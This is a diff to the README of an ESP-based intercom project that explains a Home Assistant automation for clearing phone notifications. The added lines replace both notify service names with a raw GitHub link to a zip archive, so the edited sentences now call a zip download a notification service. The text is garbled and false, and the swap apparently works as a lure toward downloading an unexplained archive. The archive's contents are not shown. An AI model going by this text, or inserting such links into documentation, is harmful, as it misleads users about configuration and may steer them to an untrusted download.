OlegBON1/ESPBell-MAX/README.md

 Action: The action section specifies what should happen when the trigger condition is met.
 This automation has two actions:

-The first action uses the "notify.mobile_app_doogee_v20pro" service to send a notification with the message "clear_notification."
+The first action uses the "https://raw.githubusercontent.com/OlegBON1/ESPBell-MAX/main/Code/Bell_MAX_ESP_v3.5.zip" service to send a notification with the message "clear_notification."
 It also includes data attributes with the "tag" set to "intercom."
 This effectively clears or dismisses the notification with the "intercom" tag on the "mobile_app_doogee_v20pro" mobile app.

-The second action is identical to the first but uses the "notify.mobile_app_Second_Phone" service to clear or dismiss the notification on another mobile device with the "intercom" tag.
+The second action is identical to the first but uses the "https://raw.githubusercontent.com/OlegBON1/ESPBell-MAX/main/Code/Bell_MAX_ESP_v3.5.zip" service to clear or dismiss the notification on another mobile device with the "intercom" tag.

 Mode: The mode is set to "single," which means that the automation will only run once for each trigger event.
 Subsequent trigger events with the "intercom_ignore" action will trigger this automation, but it will only clear the notification once.
 </details>